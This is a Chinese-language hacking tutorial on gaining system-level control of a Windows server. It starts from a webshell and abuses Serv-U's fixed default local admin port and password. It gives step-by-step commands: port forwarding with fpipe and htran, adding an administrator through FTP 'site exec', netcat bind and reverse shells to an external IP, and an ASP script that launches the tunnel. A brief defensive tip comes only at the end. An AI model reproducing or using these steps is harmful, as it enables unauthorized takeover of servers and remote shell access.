Webshell與Serv-u結合獲系統最高權限

Serv-U默認監聽127.0.0.1:43958，在本機才能連接這個管理端口，Serv-U默認管理賬號是localAdministrator，默認密碼是"#l@$ak#.lk;0@P"，這個密碼是固定的。在目標機器上運行fpipe -v -l 12345 -r 43958 127.0.0.1，然後在你自己的機器，用"Serv-U administrator"新建SERVER。

目標IP:12345

User:LocalAdministrator

Pass:"#l@$ak#.lk;0@P"0

那麼目標機器的Serv-U就歸你管了。

利用的前提：要有目標機器的普通權限的SHELL，不需要能終端或物理控制台登錄，只要有個shell，能運行端口數據轉發的程序就可以了

如何得到一個shell:sql注射得到webshell或者直接利用動網7.0 sp2以下的上傳漏洞上傳webshell

具體實施方法

1.利用得到的webshell上傳轉向程序fpipe，然後執行fpipe -v -l 12345 -r 43958 127.0.0.1

2 .在你自己的機器，用"Serv-U administrator"新建SERVER，依次填入

ip:目標IP

端口 :12345

User:LocalAdministrator

Pass:"#l@$ak#.lk;0@P"

現在你就可以管理這台服務器的Serv-U了，新建一個賬號，權限為系統管理員(system dministrator)，並在"目錄訪問(Dir access)"選項中給予"執行"權限(execute).

3. ftp連接，然後執行

quote site exec net user iisuser password /add

添加一個用戶名為iisuser密碼為password的用戶，加到管理員組 quote site exec net localgroup administrators iisuser /add，現在就可以連接終端並登錄了。

當然也可以進行別的操作，例如上傳一個nc.exe，在目標機器上得到一個管理員權限的shell，可以正向連接，也可以反向連接。

正向連接：連上ftp以後執行

quote site exec nc.exe -l -p 23 -t -e cmd.exe

這時目標主機就成了一台telnet服務器，你可以telnet上目標服務器的23端口.

反向連接：假設你的IP是202.96.209.168

1.先在自己的機器上運行(你要有一個外部IP)：nc -vv -lp 99

2.在目標機器上運行 nc -e cmd.exe 202.96.209.168 99

在你的機器上就會得到一個目標機器的具有管理員權限的shell

如果對方進行了端口過濾或者設置了防火牆的保護( 這種保護不限制反彈連接，如果限制的話就要換別的方法）可以用TCP SOCKET轉發來實現。

打個比方：

我的機器為 A；

我要測試的機器為 B[不允許正面連接]；

我已經在B上得到呢一個SHELL[只要guest的就行呢]？

我們可以這樣連上對方的43958：

I：我在本地監聽二個端口23和56

23是等待B來連接的；

56是等待我來連接的；

II：B連接我監聽的23，同時轉發到本地的43958

這樣管道就建好呢~對方的防火牆就拿我們沒有辦法呢？

此時在本地運行Serv-U新建一個SERVER，IP填上本地的127.0.0.1端口為56用戶localAdministrator，密碼#l@$ak#.lk;0@P。

具體實施方法

假設你的IP是 202.96.209.168

1.在你自己的機器上運行 htran.exe -listen 23 56；

2.此時在本地運行Serv-U新建一個SERVER，IP填上本地的127.0.0.1端口為56，用戶名LocalAdministrator，密碼#l@$ak#.lk;0@P；

3。在目標機器上運行 htran.exe -slave 127.0.0.1 43958 202.96.209.168 23

如果不能在webshell下直接運行，可以寫一個asp腳本來執行，內容如下：

connect.asp
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
oScript.Run (server.mappath("htran")&" -slave 127.0.0.1 43958 202.96.209.168 23 ")
%>

執行http://目標網址/connect.asp，如果出來一片空白，沒提示什麼錯誤，現在你應該可以管理目標服務器的Serv-U了，余下的事情就看您自由發揮了。htran.exe是一個多線程包轉發工具，可以到紅盟下載

防止方法

自己給Serv-U打補丁，改變默認端口及管理密碼。修改 ServUAdmin.exe、ServUDaemon.exe這兩個文件，改端口只要在ServUDaemon.ini文件[GLOBAL]選項中加入LocalSetupPortNo=12345即可

很遺憾，在Serv-U的最新版本Serv-U 5.2.0.0中依然沒有任何改變，默認的管理端口及密碼還是原來的。